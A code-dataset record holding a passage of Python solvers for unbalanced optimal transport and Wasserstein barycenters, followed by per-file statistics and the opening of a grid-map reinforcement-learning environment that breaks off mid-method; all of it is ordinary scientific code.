Max number of iterations
stopThr : float, optional
Stop threshold on error (> 0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
if n_hists == 1:
- gamma : (dim_a, dim_b) array-like
Optimal transportation matrix for the given parameters
- log : dict
log dictionary returned only if `log` is `True`
else:
- ot_distance : (n_hists,) array-like
the OT distance between :math:`\mathbf{a}` and each of the histograms :math:`\mathbf{b}_i`
- log : dict
log dictionary returned only if `log` is `True`
Examples
--------
>>> import ot
>>> a=[.5, .5]
>>> b=[.5, .5]
>>> M=[[0., 1.],[1., 0.]]
>>> ot.unbalanced.sinkhorn_knopp_unbalanced(a, b, M, 1., 1.)
array([[0.51122823, 0.18807035],
[0.18807035, 0.51122823]])
.. _references-sinkhorn-knopp-unbalanced:
References
----------
.. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).
Scaling algorithms for unbalanced transport problems. arXiv preprint
arXiv:1607.05816.
.. [25] Frogner C., Zhang C., Mobahi H., Araya-Polo M., Poggio T. :
Learning with a Wasserstein Loss, Advances in Neural Information
Processing Systems (NIPS) 2015
See Also
--------
ot.lp.emd : Unregularized OT
ot.optim.cg : General regularized OT
"""
M, a, b = list_to_array(M, a, b)
nx = get_backend(M, a, b)
dim_a, dim_b = M.shape
if len(a) == 0:
a = nx.ones(dim_a, type_as=M) / dim_a
if len(b) == 0:
b = nx.ones(dim_b, type_as=M) / dim_b
if len(b.shape) > 1:
n_hists = b.shape[1]
else:
n_hists = 0
if log:
log = {'err': []}
# we assume that no distances are null except those of the diagonal of
# distances
if n_hists:
u = nx.ones((dim_a, 1), type_as=M) / dim_a
v = nx.ones((dim_b, n_hists), type_as=M) / dim_b
a = a.reshape(dim_a, 1)
else:
u = nx.ones(dim_a, type_as=M) / dim_a
v = nx.ones(dim_b, type_as=M) / dim_b
K = nx.exp(M / (-reg))
fi = reg_m / (reg_m + reg)
err = 1.
for i in range(numItermax):
uprev = u
vprev = v
Kv = nx.dot(K, v)
u = (a / Kv) ** fi
Ktu = nx.dot(K.T, u)
v = (b / Ktu) ** fi
if (nx.any(Ktu == 0.)
or nx.any(nx.isnan(u)) or nx.any(nx.isnan(v))
or nx.any(nx.isinf(u)) or nx.any(nx.isinf(v))):
# we have reached the machine precision
# come back to previous solution and quit loop
warnings.warn('Numerical errors at iteration %s' % i)
u = uprev
v = vprev
break
err_u = nx.max(nx.abs(u - uprev)) / max(
nx.max(nx.abs(u)), nx.max(nx.abs(uprev)), 1.
)
err_v = nx.max(nx.abs(v - vprev)) / max(
nx.max(nx.abs(v)), nx.max(nx.abs(vprev)), 1.
)
err = 0.5 * (err_u + err_v)
if log:
log['err'].append(err)
if verbose:
if i % 50 == 0:
print(
'{:5s}|{:12s}'.format('It.', 'Err') + '\n' + '-' * 19)
print('{:5d}|{:8e}|'.format(i, err))
if err < stopThr:
break
if log:
log['logu'] = nx.log(u + 1e-300)
log['logv'] = nx.log(v + 1e-300)
if n_hists: # return only loss
res = nx.einsum('ik,ij,jk,ij->k', u, K, v, M)
if log:
return res, log
else:
return res
else: # return OT matrix
if log:
return u[:, None] * K * v[None, :], log
else:
return u[:, None] * K * v[None, :]
def sinkhorn_stabilized_unbalanced(a, b, M, reg, reg_m, tau=1e5, numItermax=1000,
stopThr=1e-6, verbose=False, log=False,
**kwargs):
r"""
Solve the entropic regularization unbalanced optimal transport
problem and return the loss
The function solves the following optimization problem using log-domain
stabilization as proposed in :ref:`[10] <references-sinkhorn-stabilized-unbalanced>`:
.. math::
W = \min_\gamma \quad \langle \gamma, \mathbf{M} \rangle_F + \mathrm{reg}\cdot\Omega(\gamma) +
\mathrm{reg_m} \cdot \mathrm{KL}(\gamma \mathbf{1}, \mathbf{a}) +
\mathrm{reg_m} \cdot \mathrm{KL}(\gamma^T \mathbf{1}, \mathbf{b})
s.t.
\gamma \geq 0
where :
- :math:`\mathbf{M}` is the (`dim_a`, `dim_b`) metric cost matrix
- :math:`\Omega` is the entropic regularization term, :math:`\Omega(\gamma)=\sum_{i,j} \gamma_{i,j}\log(\gamma_{i,j})`
- :math:`\mathbf{a}` and :math:`\mathbf{b}` are source and target unbalanced distributions
- KL is the Kullback-Leibler divergence
The algorithm used for solving the problem is the generalized
Sinkhorn-Knopp matrix scaling algorithm as proposed in :ref:`[10, 25] <references-sinkhorn-stabilized-unbalanced>`
Parameters
----------
a : array-like (dim_a,)
Unnormalized histogram of dimension `dim_a`
b : array-like (dim_b,) or array-like (dim_b, n_hists)
One or multiple unnormalized histograms of dimension `dim_b`.
If many, compute all the OT distances :math:`(\mathbf{a}, \mathbf{b}_i)_i`
M : array-like (dim_a, dim_b)
loss matrix
reg : float
Entropy regularization term > 0
reg_m: float
Marginal relaxation term > 0
tau : float
thershold for max value in u or v for log scaling
numItermax : int, optional
Max number of iterations
stopThr : float, optional
Stop threshold on error (>0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
if n_hists == 1:
- gamma : (dim_a, dim_b) array-like
Optimal transportation matrix for the given parameters
- log : dict
log dictionary returned only if `log` is `True`
else:
- ot_distance : (n_hists,) array-like
the OT distance between :math:`\mathbf{a}` and each of the histograms :math:`\mathbf{b}_i`
- log : dict
log dictionary returned only if `log` is `True`
Examples
--------
>>> import ot
>>> a=[.5, .5]
>>> b=[.5, .5]
>>> M=[[0., 1.],[1., 0.]]
>>> ot.unbalanced.sinkhorn_stabilized_unbalanced(a, b, M, 1., 1.)
array([[0.51122823, 0.18807035],
[0.18807035, 0.51122823]])
.. _references-sinkhorn-stabilized-unbalanced:
References
----------
.. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).
Scaling algorithms for unbalanced transport problems. arXiv preprint arXiv:1607.05816.
.. [25] Frogner C., Zhang C., Mobahi H., Araya-Polo M., Poggio T. :
Learning with a Wasserstein Loss, Advances in Neural Information
Processing Systems (NIPS) 2015
See Also
--------
ot.lp.emd : Unregularized OT
ot.optim.cg : General regularized OT
"""
a, b, M = list_to_array(a, b, M)
nx = get_backend(M, a, b)
dim_a, dim_b = M.shape
if len(a) == 0:
a = nx.ones(dim_a, type_as=M) / dim_a
if len(b) == 0:
b = nx.ones(dim_b, type_as=M) / dim_b
if len(b.shape) > 1:
n_hists = b.shape[1]
else:
n_hists = 0
if log:
log = {'err': []}
# we assume that no distances are null except those of the diagonal of
# distances
if n_hists:
u = nx.ones((dim_a, n_hists), type_as=M) / dim_a
v = nx.ones((dim_b, n_hists), type_as=M) / dim_b
a = a.reshape(dim_a, 1)
else:
u = nx.ones(dim_a, type_as=M) / dim_a
v = nx.ones(dim_b, type_as=M) / dim_b
# print(reg)
K = nx.exp(-M / reg)
fi = reg_m / (reg_m + reg)
cpt = 0
err = 1.
alpha = nx.zeros(dim_a, type_as=M)
beta = nx.zeros(dim_b, type_as=M)
while (err > stopThr and cpt < numItermax):
uprev = u
vprev = v
Kv = nx.dot(K, v)
f_alpha = nx.exp(- alpha / (reg + reg_m))
f_beta = nx.exp(- beta / (reg + reg_m))
if n_hists:
f_alpha = f_alpha[:, None]
f_beta = f_beta[:, None]
u = ((a / (Kv + 1e-16)) ** fi) * f_alpha
Ktu = nx.dot(K.T, u)
v = ((b / (Ktu + 1e-16)) ** fi) * f_beta
absorbing = False
if nx.any(u > tau) or nx.any(v > tau):
absorbing = True
if n_hists:
alpha = alpha + reg * nx.log(nx.max(u, 1))
beta = beta + reg * nx.log(nx.max(v, 1))
else:
alpha = alpha + reg * nx.log(nx.max(u))
beta = beta + reg * nx.log(nx.max(v))
K = nx.exp((alpha[:, None] + beta[None, :] - M) / reg)
v = nx.ones(v.shape, type_as=v)
Kv = nx.dot(K, v)
if (nx.any(Ktu == 0.)
or nx.any(nx.isnan(u)) or nx.any(nx.isnan(v))
or nx.any(nx.isinf(u)) or nx.any(nx.isinf(v))):
# we have reached the machine precision
# come back to previous solution and quit loop
warnings.warn('Numerical errors at iteration %s' % cpt)
u = uprev
v = vprev
break
if (cpt % 10 == 0 and not absorbing) or cpt == 0:
# we can speed up the process by checking for the error only all
# the 10th iterations
err = nx.max(nx.abs(u - uprev)) / max(
nx.max(nx.abs(u)), nx.max(nx.abs(uprev)), 1.
)
if log:
log['err'].append(err)
if verbose:
if cpt % 200 == 0:
print(
'{:5s}|{:12s}'.format('It.', 'Err') + '\n' + '-' * 19)
print('{:5d}|{:8e}|'.format(cpt, err))
cpt = cpt + 1
if err > stopThr:
warnings.warn("Stabilized Unbalanced Sinkhorn did not converge." +
"Try a larger entropy `reg` or a lower mass `reg_m`." +
"Or a larger absorption threshold `tau`.")
if n_hists:
logu = alpha[:, None] / reg + nx.log(u)
logv = beta[:, None] / reg + nx.log(v)
else:
logu = alpha / reg + nx.log(u)
logv = beta / reg + nx.log(v)
if log:
log['logu'] = logu
log['logv'] = logv
if n_hists: # return only loss
res = nx.logsumexp(
nx.log(M + 1e-100)[:, :, None]
+ logu[:, None, :]
+ logv[None, :, :]
- M[:, :, None] / reg,
axis=(0, 1)
)
res = nx.exp(res)
if log:
return res, log
else:
return res
else: # return OT matrix
ot_matrix = nx.exp(logu[:, None] + logv[None, :] - M / reg)
if log:
return ot_matrix, log
else:
return ot_matrix
def barycenter_unbalanced_stabilized(A, M, reg, reg_m, weights=None, tau=1e3,
numItermax=1000, stopThr=1e-6,
verbose=False, log=False):
r"""Compute the entropic unbalanced wasserstein barycenter of :math:`\mathbf{A}` with stabilization.
The function solves the following optimization problem:
.. math::
\mathbf{a} = \mathop{\arg \min}_\mathbf{a} \quad \sum_i W_{u_{reg}}(\mathbf{a},\mathbf{a}_i)
where :
- :math:`W_{u_{reg}}(\cdot,\cdot)` is the unbalanced entropic regularized Wasserstein distance (see :py:func:`ot.unbalanced.sinkhorn_unbalanced`)
- :math:`\mathbf{a}_i` are training distributions in the columns of matrix :math:`\mathbf{A}`
- reg and :math:`\mathbf{M}` are respectively the regularization term and the cost matrix for OT
- reg_mis the marginal relaxation hyperparameter
The algorithm used for solving the problem is the generalized
Sinkhorn-Knopp matrix scaling algorithm as proposed in :ref:`[10] <references-barycenter-unbalanced-stabilized>`
Parameters
----------
A : array-like (dim, n_hists)
`n_hists` training distributions :math:`\mathbf{a}_i` of dimension `dim`
M : array-like (dim, dim)
ground metric matrix for OT.
reg : float
Entropy regularization term > 0
reg_m : float
Marginal relaxation term > 0
tau : float
Stabilization threshold for log domain absorption.
weights : array-like (n_hists,) optional
Weight of each distribution (barycentric coodinates)
If None, uniform weights are used.
numItermax : int, optional
Max number of iterations
stopThr : float, optional
Stop threshold on error (> 0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
a : (dim,) array-like
Unbalanced Wasserstein barycenter
log : dict
log dictionary return only if log==True in parameters
.. _references-barycenter-unbalanced-stabilized:
References
----------
.. [3] Benamou, J. D., Carlier, G., Cuturi, M., Nenna, L., & Peyré,
G. (2015). Iterative Bregman projections for regularized transportation
problems. SIAM Journal on Scientific Computing, 37(2), A1111-A1138.
.. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).
Scaling algorithms for unbalanced transport problems. arXiv preprint
arXiv:1607.05816.
"""
A, M = list_to_array(A, M)
nx = get_backend(A, M)
dim, n_hists = A.shape
if weights is None:
weights = nx.ones(n_hists, type_as=A) / n_hists
else:
assert(len(weights) == A.shape[1])
if log:
log = {'err': []}
fi = reg_m / (reg_m + reg)
u = nx.ones((dim, n_hists), type_as=A) / dim
v = nx.ones((dim, n_hists), type_as=A) / dim
# print(reg)
K = nx.exp(-M / reg)
fi = reg_m / (reg_m + reg)
cpt = 0
err = 1.
alpha = nx.zeros(dim, type_as=A)
beta = nx.zeros(dim, type_as=A)
q = nx.ones(dim, type_as=A) / dim
for i in range(numItermax):
qprev = nx.copy(q)
Kv = nx.dot(K, v)
f_alpha = nx.exp(- alpha / (reg + reg_m))
f_beta = nx.exp(- beta / (reg + reg_m))
f_alpha = f_alpha[:, None]
f_beta = f_beta[:, None]
u = ((A / (Kv + 1e-16)) ** fi) * f_alpha
Ktu = nx.dot(K.T, u)
q = (Ktu ** (1 - fi)) * f_beta
q = nx.dot(q, weights) ** (1 / (1 - fi))
Q = q[:, None]
v = ((Q / (Ktu + 1e-16)) ** fi) * f_beta
absorbing = False
if nx.any(u > tau) or nx.any(v > tau):
absorbing = True
alpha = alpha + reg * nx.log(nx.max(u, 1))
beta = beta + reg * nx.log(nx.max(v, 1))
K = nx.exp((alpha[:, None] + beta[None, :] - M) / reg)
v = nx.ones(v.shape, type_as=v)
Kv = nx.dot(K, v)
if (nx.any(Ktu == 0.)
or nx.any(nx.isnan(u)) or nx.any(nx.isnan(v))
or nx.any(nx.isinf(u)) or nx.any(nx.isinf(v))):
# we have reached the machine precision
# come back to previous solution and quit loop
warnings.warn('Numerical errors at iteration %s' % cpt)
q = qprev
break
if (i % 10 == 0 and not absorbing) or i == 0:
# we can speed up the process by checking for the error only all
# the 10th iterations
err = nx.max(nx.abs(q - qprev)) / max(
nx.max(nx.abs(q)), nx.max(nx.abs(qprev)), 1.
)
if log:
log['err'].append(err)
if verbose:
if i % 50 == 0:
print(
'{:5s}|{:12s}'.format('It.', 'Err') + '\n' + '-' * 19)
print('{:5d}|{:8e}|'.format(i, err))
if err < stopThr:
break
if err > stopThr:
warnings.warn("Stabilized Unbalanced Sinkhorn did not converge." +
"Try a larger entropy `reg` or a lower mass `reg_m`." +
"Or a larger absorption threshold `tau`.")
if log:
log['niter'] = i
log['logu'] = nx.log(u + 1e-300)
log['logv'] = nx.log(v + 1e-300)
return q, log
else:
return q
def barycenter_unbalanced_sinkhorn(A, M, reg, reg_m, weights=None,
numItermax=1000, stopThr=1e-6,
verbose=False, log=False):
r"""Compute the entropic unbalanced wasserstein barycenter of :math:`\mathbf{A}`.
The function solves the following optimization problem with :math:`\mathbf{a}`
.. math::
\mathbf{a} = \mathop{\arg \min}_\mathbf{a} \quad \sum_i W_{u_{reg}}(\mathbf{a},\mathbf{a}_i)
where :
- :math:`W_{u_{reg}}(\cdot,\cdot)` is the unbalanced entropic regularized Wasserstein distance (see :py:func:`ot.unbalanced.sinkhorn_unbalanced`)
- :math:`\mathbf{a}_i` are training distributions in the columns of matrix :math:`\mathbf{A}`
- reg and :math:`\mathbf{M}` are respectively the regularization term and the cost matrix for OT
- reg_mis the marginal relaxation hyperparameter
The algorithm used for solving the problem is the generalized
Sinkhorn-Knopp matrix scaling algorithm as proposed in :ref:`[10] <references-barycenter-unbalanced-sinkhorn>`
Parameters
----------
A : array-like (dim, n_hists)
`n_hists` training distributions :math:`\mathbf{a}_i` of dimension `dim`
M : array-like (dim, dim)
ground metric matrix for OT.
reg : float
Entropy regularization term > 0
reg_m: float
Marginal relaxation term > 0
weights : array-like (n_hists,) optional
Weight of each distribution (barycentric coodinates)
If None, uniform weights are used.
numItermax : int, optional
Max number of iterations
stopThr : float, optional
Stop threshold on error (> 0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
a : (dim,) array-like
Unbalanced Wasserstein barycenter
log : dict
log dictionary return only if log==True in parameters
.. _references-barycenter-unbalanced-sinkhorn:
References
----------
.. [3] Benamou, J. D., Carlier, G., Cuturi, M., Nenna, L., & Peyré, G.
(2015). Iterative Bregman projections for regularized transportation
problems. SIAM Journal on Scientific Computing, 37(2), A1111-A1138.
.. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).
Scaling algorithms for unbalanced transport problems. arXiv preprin
arXiv:1607.05816.
"""
A, M = list_to_array(A, M)
nx = get_backend(A, M)
dim, n_hists = A.shape
if weights is None:
weights = nx.ones(n_hists, type_as=A) / n_hists
else:
assert(len(weights) == A.shape[1])
if log:
log = {'err': []}
K = nx.exp(-M / reg)
fi = reg_m / (reg_m + reg)
v = nx.ones((dim, n_hists), type_as=A)
u = nx.ones((dim, 1), type_as=A)
q = nx.ones(dim, type_as=A)
err = 1.
for i in range(numItermax):
uprev = nx.copy(u)
vprev = nx.copy(v)
qprev = nx.copy(q)
Kv = nx.dot(K, v)
u = (A / Kv) ** fi
Ktu = nx.dot(K.T, u)
q = nx.dot(Ktu ** (1 - fi), weights)
q = q ** (1 / (1 - fi))
Q = q[:, None]
v = (Q / Ktu) ** fi
if (nx.any(Ktu == 0.)
or nx.any(nx.isnan(u)) or nx.any(nx.isnan(v))
or nx.any(nx.isinf(u)) or nx.any(nx.isinf(v))):
# we have reached the machine precision
# come back to previous solution and quit loop
warnings.warn('Numerical errors at iteration %s' % i)
u = uprev
v = vprev
q = qprev
break
# compute change in barycenter
err = nx.max(nx.abs(q - qprev)) / max(
nx.max(nx.abs(q)), nx.max(nx.abs(qprev)), 1.0
)
if log:
log['err'].append(err)
# if barycenter did not change + at least 10 iterations - stop
if err < stopThr and i > 10:
break
if verbose:
if i % 10 == 0:
print(
'{:5s}|{:12s}'.format('It.', 'Err') + '\n' + '-' * 19)
print('{:5d}|{:8e}|'.format(i, err))
if log:
log['niter'] = i
log['logu'] = nx.log(u + 1e-300)
log['logv'] = nx.log(v + 1e-300)
return q, log
else:
return q
def barycenter_unbalanced(A, M, reg, reg_m, method="sinkhorn", weights=None,
numItermax=1000, stopThr=1e-6,
verbose=False, log=False, **kwargs):
r"""Compute the entropic unbalanced wasserstein barycenter of :math:`\mathbf{A}`.
The function solves the following optimization problem with :math:`\mathbf{a}`
.. math::
\mathbf{a} = \mathop{\arg \min}_\mathbf{a} \quad \sum_i W_{u_{reg}}(\mathbf{a},\mathbf{a}_i)
where :
- :math:`W_{u_{reg}}(\cdot,\cdot)` is the unbalanced entropic regularized Wasserstein distance (see :py:func:`ot.unbalanced.sinkhorn_unbalanced`)
- :math:`\mathbf{a}_i` are training distributions in the columns of matrix :math:`\mathbf{A}`
- reg and :math:`\mathbf{M}` are respectively the regularization term and the cost matrix for OT
- reg_mis the marginal relaxation hyperparameter
The algorithm used for solving the problem is the generalized
Sinkhorn-Knopp matrix scaling algorithm as proposed in :ref:`[10] <references-barycenter-unbalanced>`
Parameters
----------
A : array-like (dim, n_hists)
`n_hists` training distributions :math:`\mathbf{a}_i` of dimension `dim`
M : array-like (dim, dim)
ground metric matrix for OT.
reg : float
Entropy regularization term > 0
reg_m: float
Marginal relaxation term > 0
weights : array-like (n_hists,) optional
Weight of each distribution (barycentric coodinates)
If None, uniform weights are used.
numItermax : int, optional
Max number of iterations
stopThr : float, optional
Stop threshold on error (> 0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
a : (dim,) array-like
Unbalanced Wasserstein barycenter
log : dict
log dictionary return only if log==True in parameters
.. _references-barycenter-unbalanced:
References
----------
.. [3] Benamou, J. D., Carlier, G., Cuturi, M., Nenna, L., & Peyré, G.
(2015). Iterative Bregman projections for regularized transportation
problems. SIAM Journal on Scientific Computing, 37(2), A1111-A1138.
.. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).
Scaling algorithms for unbalanced transport problems. arXiv preprin
arXiv:1607.05816.
"""
if method.lower() == 'sinkhorn':
return barycenter_unbalanced_sinkhorn(A, M, reg, reg_m,
weights=weights,
numItermax=numItermax,
stopThr=stopThr, verbose=verbose,
log=log, **kwargs)
elif method.lower() == 'sinkhorn_stabilized':
return barycenter_unbalanced_stabilized(A, M, reg, reg_m,
weights=weights,
numItermax=numItermax,
stopThr=stopThr,
verbose=verbose,
log=log, **kwargs)
elif method.lower() in ['sinkhorn_reg_scaling']:
warnings.warn('Method not implemented yet. Using classic Sinkhorn Knopp')
return barycenter_unbalanced(A, M, reg, reg_m,
weights=weights,
numItermax=numItermax,
stopThr=stopThr, verbose=verbose,
log=log, **kwargs)
else:
raise ValueError("Unknown method '%s'." % method)
def mm_unbalanced(a, b, M, reg_m, div='kl', G0=None, numItermax=1000,
stopThr=1e-15, verbose=False, log=False):
r"""
Solve the unbalanced optimal transport problem and return the OT plan.
The function solves the following optimization problem:
.. math::
W = \min_\gamma \quad \langle \gamma, \mathbf{M} \rangle_F +
\mathrm{reg_m} \cdot \mathrm{div}(\gamma \mathbf{1}, \mathbf{a}) +
\mathrm{reg_m} \cdot \mathrm{div}(\gamma^T \mathbf{1}, \mathbf{b})
s.t.
\gamma \geq 0
where:
- :math:`\mathbf{M}` is the (`dim_a`, `dim_b`) metric cost matrix
- :math:`\mathbf{a}` and :math:`\mathbf{b}` are source and target
unbalanced distributions
- div is a divergence, either Kullback-Leibler or :math:`\ell_2` divergence
The algorithm used for solving the problem is a maximization-
minimization algorithm as proposed in :ref:`[41] <references-regpath>`
Parameters
----------
a : array-like (dim_a,)
Unnormalized histogram of dimension `dim_a`
b : array-like (dim_b,)
Unnormalized histogram of dimension `dim_b`
M : array-like (dim_a, dim_b)
loss matrix
reg_m: float
Marginal relaxation term > 0
div: string, optional
Divergence to quantify the difference between the marginals.
Can take two values: 'kl' (Kullback-Leibler) or 'l2' (quadratic)
G0: array-like (dim_a, dim_b)
Initialization of the transport matrix
numItermax : int, optional
Max number of iterations
stopThr : float, optional
Stop threshold on error (> 0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
gamma : (dim_a, dim_b) array-like
Optimal transportation matrix for the given parameters
log : dict
log dictionary returned only if `log` is `True`
Examples
--------
>>> import ot
>>> import numpy as np
>>> a=[.5, .5]
>>> b=[.5, .5]
>>> M=[[1., 36.],[9., 4.]]
>>> np.round(ot.unbalanced.mm_unbalanced(a, b, M, 1, 'kl'), 2)
array([[0.3 , 0. ],
[0. , 0.07]])
>>> np.round(ot.unbalanced.mm_unbalanced(a, b, M, 1, 'l2'), 2)
array([[0.25, 0. ],
[0. , 0. ]])
.. _references-regpath:
References
----------
.. [41] Chapel, L., Flamary, R., Wu, H., Févotte, C., and Gasso, G. (2021).
Unbalanced optimal transport through non-negative penalized
linear regression. NeurIPS.
See Also
--------
ot.lp.emd : Unregularized OT
ot.unbalanced.sinkhorn_unbalanced : Entropic regularized OT
"""
M, a, b = list_to_array(M, a, b)
nx = get_backend(M, a, b)
dim_a, dim_b = M.shape
if len(a) == 0:
a = nx.ones(dim_a, type_as=M) / dim_a
if len(b) == 0:
b = nx.ones(dim_b, type_as=M) / dim_b
if G0 is None:
G = a[:, None] * b[None, :]
else:
G = G0
if log:
log = {'err': [], 'G': []}
if div == 'kl':
K = nx.exp(M / - reg_m / 2)
elif div == 'l2':
K = nx.maximum(a[:, None] + b[None, :] - M / reg_m / 2,
nx.zeros((dim_a, dim_b), type_as=M))
else:
warnings.warn("The div parameter should be either equal to 'kl' or \
'l2': it has been set to 'kl'.")
div = 'kl'
K = nx.exp(M / - reg_m / 2)
for i in range(numItermax):
Gprev = G
if div == 'kl':
u = nx.sqrt(a / (nx.sum(G, 1) + 1e-16))
v = nx.sqrt(b / (nx.sum(G, 0) + 1e-16))
G = G * K * u[:, None] * v[None, :]
elif div == 'l2':
Gd = nx.sum(G, 0, keepdims=True) + nx.sum(G, 1, keepdims=True) + 1e-16
G = G * K / Gd
err = nx.sqrt(nx.sum((G - Gprev) ** 2))
if log:
log['err'].append(err)
log['G'].append(G)
if verbose:
print('{:5d}|{:8e}|'.format(i, err))
if err < stopThr:
break
if log:
log['cost'] = nx.sum(G * M)
return G, log
else:
return G
def mm_unbalanced2(a, b, M, reg_m, div='kl', G0=None, numItermax=1000,
stopThr=1e-15, verbose=False, log=False):
r"""
Solve the unbalanced optimal transport problem and return the OT plan.
The function solves the following optimization problem:
.. math::
W = \min_\gamma \quad \langle \gamma, \mathbf{M} \rangle_F +
\mathrm{reg_m} \cdot \mathrm{div}(\gamma \mathbf{1}, \mathbf{a}) +
\mathrm{reg_m} \cdot \mathrm{div}(\gamma^T \mathbf{1}, \mathbf{b})
s.t.
\gamma \geq 0
where:
- :math:`\mathbf{M}` is the (`dim_a`, `dim_b`) metric cost matrix
- :math:`\mathbf{a}` and :math:`\mathbf{b}` are source and target
unbalanced distributions
- :math:`\mathrm{div}` is a divergence, either Kullback-Leibler or :math:`\ell_2` divergence
The algorithm used for solving the problem is a maximization-
minimization algorithm as proposed in :ref:`[41] <references-regpath>`
Parameters
----------
a : array-like (dim_a,)
Unnormalized histogram of dimension `dim_a`
b : array-like (dim_b,)
Unnormalized histogram of dimension `dim_b`
M : array-like (dim_a, dim_b)
loss matrix
reg_m: float
Marginal relaxation term > 0
div: string, optional
Divergence to quantify the difference between the marginals.
Can take two values: 'kl' (Kullback-Leibler) or 'l2' (quadratic)
G0: array-like (dim_a, dim_b)
Initialization of the transport matrix
numItermax : int, optional
Max number of iterations
stopThr : float, optional
Stop threshold on error (> 0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
ot_distance : array-like
the OT distance between :math:`\mathbf{a}` and :math:`\mathbf{b}`
log : dict
log dictionary returned only if `log` is `True`
Examples
--------
>>> import ot
>>> import numpy as np
>>> a=[.5, .5]
>>> b=[.5, .5]
>>> M=[[1., 36.],[9., 4.]]
>>> np.round(ot.unbalanced.mm_unbalanced2(a, b, M, 1, 'l2'),2)
0.25
>>> np.round(ot.unbalanced.mm_unbalanced2(a, b, M, 1, 'kl'),2)
0.57
References
----------
.. [41] Chapel, L., Flamary, R., Wu, H., Févotte, C., and Gasso, G. (2021).
Unbalanced optimal transport through non-negative penalized
linear regression. NeurIPS.
See Also
--------
ot.lp.emd2 : Unregularized OT loss
ot.unbalanced.sinkhorn_unbalanced2 : Entropic regularized OT loss
"""
_, log_mm = mm_unbalanced(a, b, M, reg_m, div=div, G0=G0,
numItermax=numItermax, stopThr=stopThr,
verbose=verbose, log=True)
if log:
return log_mm['cost'], log_mm
else:
return log_mm['cost']
| 34.910757
| 175
| 0.558122
| 5,706
| 43,813
| 4.208377
| 0.072906
| 0.009828
| 0.014201
| 0.007329
| 0.92833
| 0.915296
| 0.903511
| 0.889018
| 0.874401
| 0.861117
| 0
| 0.025895
| 0.312487
| 43,813
| 1,254
| 176
| 34.938596
| 0.771297
| 0.551024
| 0
| 0.708145
| 0
| 0
| 0.061363
| 0
| 0
| 0
| 0
| 0
| 0.004525
| 1
| 0.020362
| false
| 0
| 0.00905
| 0
| 0.085973
| 0.020362
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90db994685f49ffedf7e8e2f398aa82acfbfbb10
| 12,783
|
py
|
Python
|
mme/envs/EnvInterfaces.py
|
seungyulhan/mme
|
f9f8bd9d6a3346c3b71faf9c6f78e3402c2924a0
|
[
"MIT"
] | null | null | null |
mme/envs/EnvInterfaces.py
|
seungyulhan/mme
|
f9f8bd9d6a3346c3b71faf9c6f78e3402c2924a0
|
[
"MIT"
] | null | null | null |
mme/envs/EnvInterfaces.py
|
seungyulhan/mme
|
f9f8bd9d6a3346c3b71faf9c6f78e3402c2924a0
|
[
"MIT"
] | 1
|
2022-01-13T03:53:31.000Z
|
2022-01-13T03:53:31.000Z
|
from __future__ import print_function
from cached_property import cached_property
import math
import numpy as np
from rllab import spaces
from rllab.misc import logger
from mme.envs import GridMap
BIG = 1e6
def get_state_block(state):
x = state[0].item()
y = state[1].item()
x_int = np.floor(x)
y_int = np.floor(y)
return x_int * 1000 + y_int
def get_two_random_indices(r, c):
"""Return a 2x2 NumPy array, containing two different index pair."""
res = np.zeros((2, 2), dtype=np.int)
while (res[0, 0] == res[1, 0] and \
res[0, 1] == res[1, 1]):
res[0, 0] = np.random.randint(0, r)
res[0, 1] = np.random.randint(0, c)
res[1, 0] = np.random.randint(0, r)
res[1, 1] = np.random.randint(0, c)
return res
class GME_NP_pure(GridMap.GridMapEnv):
def __init__(self, name="", gridMap=None, workingDir="./"):
super(GME_NP_pure, self).__init__(name, gridMap, workingDir)
# # Create map.
# self.map = GridMap.GridMap2D( 10, 20 )
gm2d = GridMap.GridMap2D(100, 100, outOfBoundValue=0) # -200
gm2d.valueStartingBlock = 0 # -0.1
gm2d.valueEndingBlock = 0
gm2d.valueNormalBlock = 0 # -0.1
gm2d.valueObstacleBlock = 0 # -10
gm2d.initialize()
# Create a starting block and an ending block.
startingBlock = GridMap.StartingBlock()
# endingBlock = GridMap.EndingBlock()
# Create an obstacle block.
obstacle = GridMap.ObstacleBlock()
# Overwrite blocks.
gm2d.set_starting_block((0, 0))
# gm2d.set_ending_block((49, 49), endPoint=(49.1, 49.1))
for i in range(5):
for j in range(100):
if not ((j < 25 and j >= 15) or (j < 85 and j >= 75)):
gm2d.add_obstacle((48 + i, j))
gm2d.add_obstacle((j, 48 + i))
# gm2d.add_obstacle((i, 23+j))
# gm2d.add_obstacle((5, 10))
# gm2d.add_obstacle((6, 10))
# gm2d.add_obstacle((30, 10))
# indexEndingBlock = gm2d.get_index_ending_block()
# ebGm2d = gm2d.get_block(indexEndingBlock)
# print("ebGm2d.is_in_range(19.2, 9.2, 1) = {}".format(ebGm2d.is_in_range(19.2, 9.2, 1)))
self.map = gm2d
self.maxStuckCount = 0
self.stuckPenaltyFactor = 0 # -10
self.stuckCount = 0
self.stuckState = None
self.timestep = 0
# Member variables for compatibility.
# self.observation_space = np.array([0, 0]) # self.observation_spac.shape should be a tuple showing the shape of the state variable.
@cached_property
def observation_space(self):
shp = (2,)
# shp = (3,)
ub = BIG * np.ones(shp)
return spaces.Box(ub * -1, ub)
@cached_property
def action_space(self):
shp = (2,)
ub = 1.0 * np.ones(shp)
return spaces.Box(ub * -1, ub)
def enable_stuck_check(self, maxStuckCount, penaltyFactor):
if (maxStuckCount < 0):
raise GridMap.GridMapException("Max stuck count must be non-negative number.")
